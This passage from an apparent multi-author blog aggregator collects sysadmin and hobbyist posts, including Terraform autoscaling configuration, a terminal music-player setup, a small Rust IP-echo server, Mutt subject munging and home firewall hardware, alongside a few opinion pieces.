Excellent. This gives us a working WordPress environment. Now we need to add our customisation – the plugin we’re deploying. In this case, I’ve been tweaking the “presenter” plugin so here’s the customise_wordpress.sh code:

#! /bin/bash

cd /var/www/html/wp-content/plugins
git clone /tmp/git_repo presenter --recurse-submodules
wp plugin activate presenter

Actually, that /tmp/git_repo path is a call-back to this line in the Vagrantfile: config.vm.synced_folder "../", "/tmp/git_repo".

And there you have it; a vanilla WordPress install, with the plugin installed and ready to test. It only took 4 years to write up a blog post for it!

As an alternative, you could instead put the plugin you’re working with in a subdirectory of the Vagrantfile and supporting files, then you’d just need to change that git clone /tmp/git_repo line to git clone /vagrant/MyPlugin – but then you can’t offer this to the plugin repo as a PR, can you? 😀

Featured image is “Killer travel plug and socket board� by “Ashley Basil� on Flickr and is released under a CC-BY license.

Phil SpencerWho’s sick of this shit yet?

I find some headlines just make me angry these days, especially ones centered around hyper late stage capitalism.


This one about Apple and Microsoft just made me go “Who the fuck cares?” and seriously, why should I care. those two idiot companies having insane and disgustingly huge market caps isn’t something I’m impressed by.

If anything it makes me furious.

Do something useful besides making iterations of the same ol junk. Make a few thousand houses, make an affordable grocery supply chain.

If you’re doing anything else you’re a waste of everyones time….as I type this on my Apple computer. Still, that bit of honesty aside I don’t give a fuck about either companies made up valuation.

Andy SmithFarewell Soekris, old friend

This morning I shut off the Soekris Engineering net4801 that has served as our home firewall / PPP termination box for just over 18½ years.

Front view of a Soekris net4801
Front view of a Soekris net4801. Clothes peg for scale.
Inside of a Soekris net4801
Inside of a Soekris net4801.

In truth this has been long overdue. Like, at least 10 years overdue. It has been struggling to cope with even our paltry ~60Mbps VDSL (what UK calls Fibre to the Cabinet). But I am very lazy, and change is work.

In theory we can get fibre from Openreach to approach 1Gbit/s down, and I should sort that out, but see above about me being really very lazy. The poor old Soekris would certainly not be viable then.

I’ve replaced it with a PC Engines APU2 (the apu2e2 model). Much like the Soekris it’s a fanless single board x86 computer with coreboot firmware so it’s manageable from the BIOS over serial.

An apu2e2 single board computer, image copyright PC Engines GmbH Rear view of an APU2 case1d2redu, image copyright PC Engines GmbH Front view of an APU2 case1d2redu, image copyright PC Engines GmbH An APU2 case1d2redu, two halves open, image copyright PC Engines GmbH
Soekris net4801 PC Engines apu2e2
CPU AMD GX1
1 core @266MHz
x86 (32-bit)
AMD GX-412TC
4 cores @1GHz (turbo 1.4GHz)
amd64 (64-bit)
Memory 128MiB 2048MiB
Storage 512MiB CompactFlash 16GiB mSATA SSD
Ports 3x 100M Ethernet, 1 serial 3x 1G Ethernet, 1 serial

The Soekris ran Debian and so does the APU2. Installing it over PXE was completely straightforward on the APU2; a bit simpler than it was with the net4801 back in 2005! If you have just one and it’s right there in the same building then it’s probably quicker to just boot the Debian installer off of USB though. I may be lazy but once I do get going I’m also pointlessly bloody-minded.

Anyway, completely stock Debian works fine, though obviously it has no display whatsoever — all non-Ethernet-based interaction would have to be done over serial. By default that runs at 115200 baud (8n1).

This is not “home server” material. Like the Soekris even in 2005 it’s weak and it’s expensive for what it is. It’s meant to be an appliance. I think I was right with the Soekris’s endurance, beyond even sensible limits, and I hope I will be right about the APU2.

The Soekris is still using its original 512M CompactFlash card from 2005 by the way. Although admittedly I did go to some effort to make it run on a read-only filesystem, only flipped to read-write for upgrades.

Jon SpriggsUsing Terraform to select multiple Instance Types for an Autoscaling Group in AWS

Tale as old as time, the compute instance type you want to use in AWS is highly contested (or worse yet, not as available in every availability zone in your region)! You plead with your TAM or AM “Please let us have more of that instance type” only to be told “well, we can put in a request, but… haven’t you thought about using a range of instance types”?

And yes, I’ve been on both sides of that conversation, sadly.

The commented terraform

# This is your legacy instance_type variable. Ideally we'd have
# a warning we could raise at this point, telling you not to use
# this variable, but... it's not ready yet.
variable "instance_type" {
  description = "The legacy single-instance size, e.g. t3.nano. Please migrate to instance_types ASAP. If you specify instance_types, this value will be ignored."
  type        = string
  default     = null
}

# This is your new instance_types value. If you don't already have
# some sort of legacy use of the instance_type variable, then don't
# bother with that variable or the locals block below!
variable "instance_types" {
  description = "A list of instance sizes, e.g. [t2.nano, t3.nano] and so on."
  type        = list(string)
  default     = null
}

# Use only this locals block (and the value further down) if you
# have some legacy autoscaling groups which might use individual
# instance_type sizes.
locals {
  # This means if var.instance_types is not defined, then use it,
  # otherwise create a new list with the single instance_type
  # value in it!
  instance_types = var.instance_types != null ? var.instance_types : [ var.instance_type ]
}

resource "aws_launch_template" "this" {
  # The prefix for the launch template name
  # default "my_autoscaling_group"
  name_prefix = var.name

  # The AMI to use. Calculated outside this process.
  image_id = data.aws_ami.this.id

  # This block ensures that any new instances are created
  # before deleting old ones.
  lifecycle {
    create_before_destroy = true
  }

  # This block defines the disk size of the root disk in GB
  block_device_mappings {
    device_name = data.aws_ami.centos.root_device_name
    ebs {
      volume_size = var.disksize # default "10"
      volume_type = var.disktype # default "gp2"
    }
  }

  # Security Groups to assign to the instance. Alternatively
  # create a network_interfaces{} block with your
  # security_groups = [ var.security_group ] in it.
  vpc_security_group_ids = [ var.security_group ]

  # Any on-boot customizations to make.
  user_data = var.userdata
}

resource "aws_autoscaling_group" "this" {
  # The name of the Autoscaling Group in the Web UI
  # default "my_autoscaling_group"
  name = var.name

  # The list of subnets into which the ASG should be deployed.
  vpc_zone_identifier = var.private_subnets
  # The smallest and largest number of instances the ASG should scale between
  min_size            = var.min_rep
  max_size            = var.max_rep

  mixed_instances_policy {
    launch_template {
      # Use this template to launch all the instances
      launch_template_specification {
        launch_template_id = aws_launch_template.this.id
        version            = "$Latest"
      }

      # This loop can either use the calculated value "local.instance_types"
      # or, if you have no legacy use of this module, remove the locals{}
      # and the variable "instance_type" {} block above, and replace the
      # for_each and instance_type values (defined as "local.instance_types")
      # with "var.instance_types".
      #
      # Loop through the whole list of instance types and create a
      # set of "override" values (the values are defined in the content{}
      # block).
      dynamic "override" {
        for_each = local.instance_types
        content {
          instance_type = local.instance_types[override.key]
        }
      }
    }

    instances_distribution {
      # If we "enable spot", then make it 100% spot.
      on_demand_percentage_above_base_capacity = var.enable_spot ? 0 : 100
      spot_allocation_strategy                 = var.spot_allocation_strategy
      spot_max_price                           = "" # Empty string is "on-demand price"
    }
  }
}

So what is all this then?

This is two Terraform resources; an aws_launch_template and an aws_autoscaling_group. These two resources define what should be launched by the autoscaling group, and then the settings for the autoscaling group.

You will need to work out what instance types you want to use (e.g. “must have 16 cores and 32 GB RAM, have an x86_64 architecture and allow up to 15 Gigabit/second throughput”)

When might you use this pattern?

If you have been seeing messages like “There is no Spot capacity available that matches your request.” or “We currently do not have sufficient <size> capacity in the Availability Zone you requested.” then you need to consider diversifying the fleet that you’re requesting for your autoscaling group. To do that, you need to specify more instance types. To achieve this, I’d use the above code to replace (something like) one of the code samples below.

If you previously have had something like this:

resource "aws_launch_configuration" "this" {
  iam_instance_profile        = var.instance_profile_name
  image_id                    = data.aws_ami.this.id
  instance_type               = var.instance_type
  name_prefix                 = var.name
  security_groups             = [ var.security_group ]
  user_data_base64            = var.userdata
  spot_price                  = var.spot_price

  root_block_device {
    volume_size = var.disksize
  }

  lifecycle {
    create_before_destroy = true
  }
}

resource "aws_autoscaling_group" "this" {
  capacity_rebalance   = false
  launch_configuration = aws_launch_configuration.this.id
  max_size             = var.max_rep
  min_size             = var.min_rep
  name                 = var.name
  vpc_zone_identifier  = var.private_subnets
}

Or this:

resource "aws_launch_template" "this" {
  lifecycle {
    create_before_destroy = true
  }

  block_device_mappings {
    device_name = data.aws_ami.this.root_device_name
    ebs {
      volume_size = var.disksize
    }
  }

  iam_instance_profile {
    name = var.instance_profile_name
  }

  network_interfaces {
    associate_public_ip_address = true
    security_groups             = local.node_security_groups
  }

  image_id      = data.aws_ami.this.id
  name_prefix   = var.name
  instance_type = var.instance_type
  user_data     = var.userdata

  instance_market_options {
    market_type = "spot"
    spot_options {
      spot_instance_type = "one-time"
    }
  }

  metadata_options {
    http_tokens                 = var.imds == 1 ? "optional" : "required"
    http_endpoint               = "enabled"
    http_put_response_hop_limit = 1
  }
}

resource "aws_autoscaling_group" "this" {
  name                = var.name
  vpc_zone_identifier = var.private_subnets
  min_size            = var.min_rep
  max_size            = var.max_rep

  launch_template {
    id      = aws_launch_template.this.id
    version = "$Latest"
  }
}

Then this new method is a much better idea :) Even more so if you had two launch templates to support spot and non-spot instance types!

Hat-tip to former colleague Paul Moran who opened my eyes to defining your fleet of variable instance types, as well as to my former customer (deliberately unnamed) and my current employer who both stumbled into the same documentation issue. Without Paul’s advice with my prior customer’s issue I’d never have known what I was looking for this time around!

Featured image is “Fishing fleet” by “Nomad Tales” on Flickr and is released under a CC-BY-SA license.

Phil SpencerNew year new…..This

I have made a new years goal to retire this server before March, the OS has been upgraded many many times over the years and various software I’ve used has come and gone so there is lots of cruft. This server/VM started in San Fransisco and then my provider stopped offering VMs in CA and moved my VM to the UK which is where it has been ever since. This VM started its life in Jan 2008 and it is time to die.

During my 2 week xmas break I have been updating web facing software as much as I could so that when I do put the bullet in the head of this thing I can transfer my blog, wiki, and a couple other still active sites to the new OS without minimal tweaking in the new home.

So far the biggest issues I ran into were with my mediawiki, that entire site is very old, from around 2006 2 years before I started hosting it for someone and then I inherited it entirely around 2009 so the database is very finicky to upgrade and some of the extensions are no longer maintained. What I ended up doing was setting up a docker instance at home to test upgrading and working through the kinks and I have put together a solid step by step on how to move/upgrade it to latest.

I have also gotten sick of running my own e-mail servers, the spam management, certificates, block lists…..it’s annoying. I found out recently that iCloud which I already have a subscription to allows up to 5 custom e-mail domains so I retired my Philtopia e-mail to it early in December and as of today I moved the vo-wiki domain to it as well. Much less hassle for me, I already work enough for work I don’t need to work at home as well.

The other work continues, site by site but I think I am on track to put an end to this ol server early in the year.

Phil Spencer8bit party

It’s been a few years…four? since my Commodore 64 collection started and I’ve now got 2 working C64’s and a C128 that functions along with 2 disk drives, a tape drive and a collection of addon hardware and boxed games.

That isn’t all I am collecting however I also have my Nintendo Entertainment System and even more recently I acquired a Sega Master System. The 8bit era really seems to catch my eye far more than anything that came after. I suppose it’s because the whole era made it on hacks and luck.

In any case here are some pictures of my collection, I don’t collect for the sake of collecting. Everything I have I use or play cause otherwise why bother having it?

Enjoy

My desk
NES
Sega Master System
Commodore 64
Games

Phil SpencerI think it’s time the blog came back

It’s been a while since I’ve written a blog post, almost 4 years in fact but I think it is time for a comeback.

The reason for this being that social media has become so locked down you can’t actually give a valid opinion about something without someone flagging your comment or it being caught by a robot. Oddly enough it seems the right wing folks can say whatever they want against the immigrant villain of the month or LGTBQIA+ issues without being flagged but if you dare stand up to them or offer an opposing opinion. 30 day ban!

So it is time to dust off the ol blog and put my opinions to paper somewhere else just like the olden days before social media! It isn’t all bad of course, I’ve found mastodon quite open to opinions but the fediverse is getting a lot of corporate attention these days and i’m sure it’s only a year or two before even that ends up a complete mess.

Crack open the blogs and let those opinions fly

Andy Smithncmpcpp — A Modern(ish) Text-Based Music Setup On Linux

Preface

This article is about how I’ve ended up (back) on the terminal-based music player ncmpcpp on my GNOME Linux desktop and laptop. I’ll cover why it is that this has happened, and some of the finer points of the configuration. The various scripts are available at GitHub. My thing now looks like this:

A screenshot of my ncmpcpp setup running in a kitty terminal, with a track change notification visible in the top right corner
A screenshot of my ncmpcpp setup running in a kitty terminal, with a track change notification visible in the top right corner

These sorts of things are inherently personal. I don’t expect that most people would have my requirements — the lack of functioning software that caters for them must indicate that — but if you do, or if you’re just interested in seeing what a modern text interface player can do on Linux, maybe you will be interested in what I came up with.

My Requirements

I’m one of those strange old-fashioned people who likes owning the music I regularly play, instead of just streaming everything, always. I don’t mind doing a stream search to play something on a whim or to check out new music, but if I think I’ll want to listen to it again then I want to own a copy of it. So I also need something to play music with.

I thought I had simple requirements.

Essential

  • Fill a play queue randomly by album, i.e. queue entire albums at once until some target number of tracks are in the queue. The sort of thing that’s often called a “dynamic playlist” or a “smart playlist” these days.
  • Have working media keys, i.e. when I press the Play/Pause button or the Next button on my keyboard, that actually happens.

That’s it. Those are my essential requirements.

Nice to have

  • Have album cover art displayed.
  • Have desktop notifications show up announcing a new track being played.

Ancient history

Literally decades ago these needs were met by the likes of Winamp and Amarok; software that’s now consigned to history. Still more than a decade ago on desktop Linux I looked around and couldn’t easily find what I wanted from any of the music apps. I settled on putting my music in mpd and using an mpd client to play it, because that way it was fairly easy to write a script for a dynamic play queue that worked exactly how I wanted it to — the most important requirement.

For a while I used a terminal-based mpd client called ncmpcpp. I’m very comfortable in a Linux terminal so this wasn’t alien to me. It’s very pleasant to use, but being text-based it doesn’t come with the niceties of media key support, album cover art or desktop notifications. The mpd client that I settled upon was GNOME’s built-in gmpc. It’s a very basic player but all it had to do was show the play queue that mpd had provided, and do the media keys, album art and notifications.

Change Is Forced Upon Me

Fast forward to December 2023 and I found myself desperately needing to upgrade my Ubuntu 18.04 desktop machine. I switched to Debian 12, which brought with it a new major version of GNOME as well as using Wayland instead of Xorg. And I found that gmpc didn’t work correctly any more! The media keys weren’t doing anything (they work fine in everything else), and I didn’t like the notifications.

I checked out a wide range of media players again. I’m talking Rhythmbox, Clementine, Raspberry, Quod Libet and more. Some of them clearly didn’t do the play queue thing. Others might do, but were incomprehensible to me and lacking in documentation. I think the nearest might have been Rhythmbox which has a plugin that can queue a specified number of random albums. There is an 11 year old GitHub issue asking for it to just continually queue such albums. A bit clunky without that.

I expect some reading this are now shouting at their screens about how their favourite player does actually do what I want. It’s quite possible I was too ignorant to notice it or work out how. Did I mention that quite a lot of this software is not documented at all? Seriously, major pieces of software that just have a web site that is a set of screenshots and a bulleted feature list and …that’s it. I had complained about this on Fedi and got some suggestions for things to try, which I will (and I’ll check out any that are suggested here), but the thing is… I know how shell scripts work now. 😀

This Is The Way

I had a look at ncmpcpp again. I still enjoyed using it. I was able to see how I could get the niceties after all. This is how.

Required Software

Here’s the software I needed to install to make this work on Debian 12. I’m not going to particularly go into the configuration of Debian, GNOME, mpd or ncmpcpp because it doesn’t really matter how you set those up. Just first get to the point where your music is in mpd and you can start ncmpcpp to play it.

Packaged in Debian

  • mpd
  • mpc
  • ncmpcpp
  • kitty
  • timg
  • libnotify-bin
  • inotify-tools

So:

$ apt install mpd mpc ncmpcpp kitty timg libnotify-bin inotify-tools

In case you weren’t aware, you can arrange for your personal mpd to be started every time you start your desktop environment like this:

$ systemctl --user enable --now mpd

The --now flag both enables the service and starts it right away.

At this point you should have mpd running and serving your music collection to any mpd client that connects. You can verify this with gmpc which is a very simple graphical mpd client.

Not currently packaged in Debian

mpd-mpris

This small Go binary listens on the user DBUS for the media keys and issues mpd commands appropriately. If you didn’t want to use this then you could lash up something very simple that executes e.g. “mpc next” or “mpc toggle” when the relevant key is pressed, but this does it all for you. Once you’ve got it from GitHub place the binary in $HOME/bin/, the mpd-mpris.service file from my GitHub at $HOME/.config/systemd/user/mpd-mpris.service and issue:

$ systemctl --user enable --now mpd-mpris

Assuming you have a running mpd and mpd client your media keys should now control it. Test that with gmpc or whatever.

My scripts and supporting files

Just four files, and they are all in GitHub. Here’s what to do with them.

album_cover_poller.sh

Put it in $HOME/.ncmpcpp/. It shouldn’t need editing.

default_cover.jpg

Put it in $HOME/.ncmpcpp/. If you don’t like it, just substitute it with any other you like. When it comes time for timg to display it, it will scale it to fit inside the window whatever size it is on your desktop.

track_change.sh

Put it in $HOME/.ncmpcpp/. You’ll need to change candidate_name near the top if your album cover art files aren’t called cover.jpg.

viz.conf

Put it in $HOME/.ncmpcpp/. This is a cut-down example ncmpcpp config for the visualizer pane that removes a number of UI elements. It’s just for an ncmpcpp that starts on a visualizer view so feel free to customise it however you like your visualizer to be. You will need to change mpd_music_dir to match where your music is, like in your main ncmpcpp config.

The Main App

The main app displayed in the screenshot above is a kitty terminal with three windows. The leftmost 75% of the kitty terminal runs ncmpcpp defaulting to the playlist view. In the bottom right corner is a copy of ncmpcpp defaulting to the visualizer view and using the viz.conf. The top right corner is running a shell script that polls for album covert art and displays it in the terminal.

kitty is one of the newer crop of terminals that can display graphics. The timg program will detect kitty‘s graphics support and display a proper graphical image. In the absence of kitty‘s graphical protocol timg will fall back to sixel mode, which may be discernible but I wouldn’t personally want to use it.

I don’t actually use kitty as my day-to-day terminal. I use gnome-terminal and tmux. You can make a layout like this with gnome-terminal and tmux, or even kitty and tmux, but tmux doesn’t support kitty‘s graphical protocol so it would cause a fall back to sixel mode. So for this use and this use alone I use kitty and its built-in windowing support.

Album cover art for Good Vibrations: Thirty Years of The Beach Boys displayed in a kitty terminal using timg The same cover art file displayed as sixels through tmux

If you don’t want to use kitty then pick whatever terminal you like and figure out how to put some different windows in it (tmux panes work fine, layout-wise). timg will probably fall back to sixels as even the venerable xterm supports that. But assuming you are willing to use kitty, you can start it like this:

$ kitty -o font_size=16 --session ~/.config/kitty/ncmpcpp.session

That kitty session file is in GitHub with everything else, and it’s what lays things out in the main terminal window. You should now be able to start playing music in ncmpcpp and have everything work.

How Stuff Works

You don’t need to know how it works, but in case you care I will explain a bit.

There are two bash shell scripts; album_cover_poller.sh and track_change.sh.

Album cover art

album_cover_poller.sh uses inotifywait from the inotify-tools package to watch a file in a cache directory. Any time that file changes, it uses timg to display it in the upper right window and queries mpd for the meta data of the currently-playing track.

Track change tasks

track_change.sh is a bit more involved.

ncmpcpp is made to execute it when it changes track by adding this to your ncmpcpp configuration:

execute_on_song_change = "~/.ncmpcpp/track_change.sh -m /path/to/your/music/dir"

The /path/to/your/music/dir should be the same as what you have set your music library to in your MPD config. It defaults to $HOME/Music/ if not set.

First it asks mpd for a bunch of metadata about the currently-playing track. Using that it’s able to find the directory in the filesystem where the track file lives. It assumes that if album cover art is available then it will be in this directory and named cover.jpg. If it finds such a file then it copies it to the place where album_cover_poller.sh is expecting to find it. That will trigger that script’s inotifywait to display the new image. If it doesn’t find such a file then a default generic cover art image is used.

(A consequence of this is that it expects each directory in your music library to be for an album, with the cover.jpg being the album covert art. It intentionally doesn’t try to handle layouts like Artist/Track.ogg because it hasn’t got a way to know which file would be for that album. If you use some other layout I’d be interested in hearing about it. An obvious improvement would be to have it look inside each file’s metadata for art in the absence of a cover.jpg in the directory. That would be pretty easy, but it’s not relevant for my use at the moment.)

Secondly, a desktop notification is sent using notify-send. Most modern desktops including GNOME come with support for showing such notifications. Exactly how they look and the degree to which you can configure that depends upon your desktop environment. For GNOME, the answer is “like ass“, and “not at all without changing notification daemon,” but that’s the case for every notification on the system so is a bit out of scope for this article.

Other Useful Tools

I use a few other bits of software to help manage my music collection and play things nicely, that aren’t directly relevant to this.

Library maintenance

A good experience relies on there being correct metadata and files in the expected directory structure. It’s pretty common for music I buy to have junk metadata, and moving things into place would be tedious even when the metadata is correct. MusicBrainz Picard to the rescue!

It’s great at fixing metadata and then moving files en masse to my chosen directory structure. It can even be told for example that if the current track artist differs from the album artist then it should save the file out to “${album_artist}/${track_number}-${track_artist}-${track title}.mp3” so that a directory listing of a large “Various Artists” compilation album looks nice.

It also finds and saves album cover art for me.

It’s packaged in Debian.

I hear good things about beets, too, but have never tried it.

Album cover art

Picard is pretty good at finding album cover art but sometimes it can’t manage it, or it chooses sub-par images. I like the Python app sacad which tries really hard to find good quality album art and works on masses of directories at once.

Nicer desktop notifications

I really don’t like the default GNOME desktop notifications. On a 4K display they are tiny unless you crank up the general font size, in which case your entire desktop then looks like a toddler’s toy. Not only is their text tiny but they don’t hold much content either. When most track title notifications are ellipsized I start to wonder what the point is.

I replaced GNOME’s notification daemon with wired-notify, which is extremely configurable. I did have to clone it out of GitHub, install the rust toolchain and cargo build it, however.

My track change script that I talk about above will issue notifications that work on stock GNOME just as well as any other app’s notifications, but I prefer the wired-notify ones. Here’s an unscaled example.

A close up of a notification from track_change.sh
A close up of a notification from track_change.sh

It’s not a work of art by any means, but is so much better than the default experience. There’s a bunch of other people’s configs showcased on their GitHub.

Scrobbling

mpdscribble has got you covered for last.fm and Libre.fm. Again it is already packaged in Debian.

Shortcomings

If there’s any music files with tabs or newlines in any of their metadata, the scripts are going to blow up. I’m not sure of the best way to handle that one. mpc can’t format output NULL-separated like you’d do with GNU find. I’m not sure there is any character you can make it use in a format that is banned in metadata. I think worst case is simply messed up display and/or no cover art displayed, and I’d regard tabs and newlines in track metadata as a data error that I’d want to fix, so maybe I don’t care too much.

timg is supposed to scale and centre the image in the terminal, and the kitty window does resize to keep it at 25% width, 50% height, but timg is sometimes visibly a little off-centre. No ideas at the moment how to improve that.

mpd is a networked application — while by default it listens only on localhost, you can configure it to listen on any or all interfaces and be available over your local network or even the Internet. All of these scripts rely on your mpd client, in this case ncmpcpp, having direct access to the music library and its files, which is probably not going to be the case for a non-localhost mpd server. I can think of various tricky ways to handle this, but again it’s not relevant to my situation at present.

BitFolk Issue TrackerPanel - Feature #215 (New): Sort DNS domains alphabetically

The secondary DNS domains at https://panel.bitfolk.com/dns/ are currently ordered alphabetically, grouped by TLD. When there are many domains this is not completely obvious. It would perhaps be better to default to straight alpha order, or at the very least have that as an option.

Paul RaynerPrint (only) my public IP

Every now and then, I need to know my public IP. The easiest way to find it is to visit one of the sites which will display it for you, such as https://whatismyip.com. Whilst useful, all of the ones I know (including that one) are chock full of adverts, and can’t easily be scraped as part of any automated scripting.

This has been a minor irritation for years, so the other night I decided to fix it.

http://ip.pr0.uk is my answer. It’s 50 lines of rust, and is accessible via tcp on port 11111, and via http on port 8080.

use std::io::Write;

use std::net::{IpAddr, Ipv4Addr, Ipv6Addr, SocketAddr, TcpListener, TcpStream};
use chrono::Utc;
use threadpool::ThreadPool;

fn main() {
    let worker_count = 4;
    let pool = ThreadPool::new(worker_count);
    let tcp_port = 11111;
    let socket_v4_tcp = SocketAddr::new(IpAddr::V4(Ipv4Addr::new(0, 0, 0, 0)), tcp_port);

    let http_port = 8080;
    let socket_v4_http = SocketAddr::new(IpAddr::V4(Ipv4Addr::new(0, 0, 0, 0)), http_port);

    let socket_addrs = vec![socket_v4_tcp, socket_v4_http];
    let listener = TcpListener::bind(&socket_addrs[..]);
    if let Ok(listener) = listener {
        println!("Listening on {}:{}", listener.local_addr().unwrap().ip(), listener.local_addr().unwrap().port());
        for stream in listener.incoming() {
            let stream = stream.unwrap();
            let addr =stream.peer_addr().unwrap().ip().to_string();
            if stream.local_addr().unwrap_or(socket_v4_http).port() == tcp_port {
                pool.execute(move||send_tcp_response(stream, addr));
            } else {
                //http might be proxied via https so let anything which is not the tcp port be http
                pool.execute(move||send_http_response(stream, addr));
            }
        }
    } else {
        println!("Unable to bind to port")
    }
}

fn send_tcp_response(mut stream:TcpStream, addr:String) {
    stream.write_all(addr.as_bytes()).unwrap();
}

fn send_http_response(mut stream:TcpStream, addr:String) {

    let html = format!("<html><head><title>{}</title></head><body><h1>{}</h1></body></html>", addr, addr);
    let length = html.len();
    let response = format!("HTTP/1.1 200 OK\r\nContent-Length: {length}\r\n\r\n{html}" );
    stream.write_all(response.as_bytes()).unwrap();
    println!("{}\tHTTP\t{}",Utc::now().to_rfc2822(),addr)
}

A little explanation is needed on the array of SocketAddr. This came from an initial misreading of the docs, but I liked the result and decided to keep it that way. Calls to listen() will only listen on one port - the first one in the array which is free. The result is that when you run this program, it listens on port 11111. If you keep it running and start another copy, that one listens on port 80 (because it can’t bind to port 11111). So to run this on my server, I just have systemd keep 2 copies alive at any time.

The code and binaries for Linux and Windows are available on Github.

Next steps

I might well leave it there. It works for me, so it’s done. Here are some things I could do though:

1) Don’t hard code the ports 2) Proxy https 3) make a client 4) make it available as a binary for anyone to run on crates.io 5) Optionally print the ttl. This would be mostly useful to people running their own instance.

Boring Details

Logging

I log the IP, port, and time of each connection. This is just in case it ever gets flooded and I need to block an IP/range. The code you see above is the code I run. No browser detection, user agent or anythign like that is read or logged. Any data you send with the connection is discarded. If I proxied https via nginx, that might log a bit of extra data as a side effect.

Systemd setup

There’s not much to this either. I have a template file:

[Unit]
Description=Run the whatip binary. Instance %i
After=network.target

[Service]
ExecStart=/path/to/whatip
Restart=on-failure

StandardOutput=syslog
StandardError=syslog
SyslogIdentifier=whatip%i

[Install]
WantedBy=multi-user.target

stored at /etc/systemd/system/whatip@.service and then set up two instances to run:

systemctl enable whatip@1
systemctl enable whatip@2

Thanks for reading

David Leadbeater"[31m"?! ANSI Terminal security in 2023 and finding 10 CVEs

A paper detailing how unescaped output to a terminal could result in unexpected code execution, on many terminal emulators. This research found around 10 CVEs in terminal emulators across common client platforms.

Alun JonesMessing with web spiders

You've surely heard of ChatGPT and its ilk. These are massive neural networks trained using vast swathes of text. The idea is that if you've trained a network on enough - about 467 words

Andy SmithMutt wins again – subject munging on display

TL;DR:

You can munge subjects for display only using the subjectrx Mutt configuration directive.

The Setup

I use the terminal-based email reader Mutt.

Many projects that I follow are switching away from email discussion lists in favour of web-first interfaces (“forums”, I think the youngsters are calling them now) like Discourse. That is fine—there’s lots of problems with trying to run a busy community over email—but Discourse offers a “mailing list mode” and I still find my Mutt email client to be a comfortable way to follow discussions. So all my accounts on the various Discourse instances are set to mailing list mode.

The Problem

One of the slight issues I have with this is the subject lines that Discourse uses. On an instance with a lot of categories and sub-categories, these will all be prepended to the subject line of each email using up quite a lot of screen space.

The same is true for legacy mailing list subject tags, but in that environment the admins were generally conscious that whatever text they chose would be prepended to every subject, so they tend to choose terse tags like “[users]” for example.

There was a time when subject line tags were controversial amongst experienced email users, because experienced email users know how to sort and filter their mails based on headers and don’t need a tag in the subject line to let them know what an email is. It doesn’t seem to be very controversial any more; I hypothesise that’s because new Internet users don’t use email as much and so don’t value spending much time working out how to get their filtering just right, and so on. So, most legacy mailing lists that I’m part of now do use terse subject tags and not many people complain about that.

Since the posts on Discourse are primarily intended for a web browser, the verbosity of the categories is not an issue. It’s not uncommon to see a category called, say, “Help & Support” and then within that a sub-category for a particular project, e.g. “Footronic 5.x”. When Discourse sends out an email for a post to such a category, it’ll look like this:

Subject: [Help & Support] [Footronic 5.x] Need some help getting my Foo into alignment after passing through a bar-quux transform

Lots of space used by that prefix, on every message, and pointlessly so for me since these mails will have been filtered into a folder so I always know which folder I’m looking at anyway: all of the messages in that folder would be for help and support on Footronic 5.x. Like most email clients, Mutt has an index view that shows an overview of all the emails with a single line for each. Long subjects are truncated at the edge of my terminal.

I’ve put up with this for years now but the last straw was the newly-launched Ansible forum. Their category names are large and there’s lots of sub-categories. Here’s an example of what that looks like in my 95 character wide terminal.

The index view of a Mutt email client
The index view of a Mutt email client

This is quite irritating! I wondered if it could be fixed.

The Fix

Of course the Mutt community thought of this, and years ago. subjectrx! You put it in your config, specifying a regular expression to match and what it should be replaced with. For example:

subjectrx '\[Ansible\] \[[^]]*\] *' '%L%R'

That matches any sequence of “[Ansible] ” followed by another set of “[]” that have anything inside them, and replaces all of that with the left side of the match (%L) and the right side of the match (%R). So that effectively discards the tags.

This happens only on display; it doesn’t modify the actual emails on storage.

Here’s what that looks like afterwards:

The index view of a Mutt email client, with tags removed from subject lines
The index view of a Mutt email client, with tags removed from subject lines

Much better, right?

And that’s one of the reasons why I continue to use Mutt.

Other Solutions

Off the top of my head, there are some other ways this could have been done.

Alter emails upon delivery

It would have been pretty simple to strip these tags out of emails as they were being delivered, but I really like to keep emails on storage the same as they were when they arrived. At the very least doing this will cause a DKIM failure as I would have modified the message after it was signed. That wouldn’t be an issue for my delivery since my DKIM check would happen before any such editing, but I’d still rather not.

Run the subject lines through an external filter program

The format of many things in Mutt is highly configurable and one such format is index_format, which controls how the lines on the index view are displayed.

Sadly there is not a builtin format specifier to search and replace in the subject tag (or any other tag), but you can run the whole thing through an external program, which could do anything you liked to it. That would involve fork()ing and exec()ing a process for every single mail in a mailbox though. Yuck.

On Discourse

This is not a gripe about Discourse. I think Discourse is a better way to run a busy community than email lists. At this point I’d be happy for most mailing lists I’m part of to switch to Discourse instances, especially the very busy ones. I’m impressed with the amount of work and features that Discourse now has.

The only exception to that I think is that purely question-answer support mailing lists might be better off with a StackOverflow-style approach like AskUbuntu. But failing that, I think Discourse is still many times better than a mailing list for that use case.

Not that you asked, but I think the primary problem with email as a community platform is that only old people use email. In the 21st century it’s an unacceptable barrier to entry.

The next most serious problem with email for running a community is that any decently-sized community will have a certain percentage of utter numpties; these utter numpties won’t be self-aware enough to know they are utter numpties, and they will post a lot of nonsense. The only way to counter a numpty posting nonsense is to reply to it and call them out. That is exhausting, unrewarding work, which frequently goes wrong, adding to the noise and ill-feeling. Problem posters do not get dealt with until they reach a level bad enough to warrant their posting rights being removed. Forums like Discourse scale their moderation tasks much better, with a lot of it being amenable to wide community input.

I could go on to list a lot more serious problems but those two are the worst in my opinion.

BitFolk Issue TrackerPanel - Bug #214 (New): List of referrals includes closed accounts in the total

At the bottom of the customer's list of referrals is the line "That's about £xx.xx per year!" The "£xx.xx" is a total of all their referrals ever, even if those referrals are no longer active. It only makes sense to add up active referrals, while still showing all referrals.

Andy SmithHappy birthday, /dev/sdd?

One of my hard drives reaches 120,000 hours of operation in about a month:

$ ~/src/blkleaderboard/blkleaderboard.sh
     sdd 119195 hours (13.59 years) 0.29TiB ST3320620AS
     sdb 114560 hours (13.06 years) 0.29TiB ST3320620AS
     sda 113030 hours (12.89 years) 0.29TiB ST3320620AS
     sdk  76904 hours ( 8.77 years) 2.73TiB WDC WD30EZRX-00D
     sdh  66018 hours ( 7.53 years) 0.91TiB Hitachi HUA72201
     sde  45746 hours ( 5.21 years) 0.91TiB SanDisk SDSSDH31
     sdc  39179 hours ( 4.46 years) 0.29TiB ST3320418AS
     sdf  28758 hours ( 3.28 years) 1.82TiB Samsung SSD 860
     sdj  28637 hours ( 3.26 years) 1.75TiB KINGSTON SUV5001
     sdg  23067 hours ( 2.63 years) 1.75TiB KINGSTON SUV5001
     sdi   9596 hours ( 1.09 years) 0.45TiB ST500DM002-1BD14

It’s a 320GB Seagate Barracuda 7200.10.

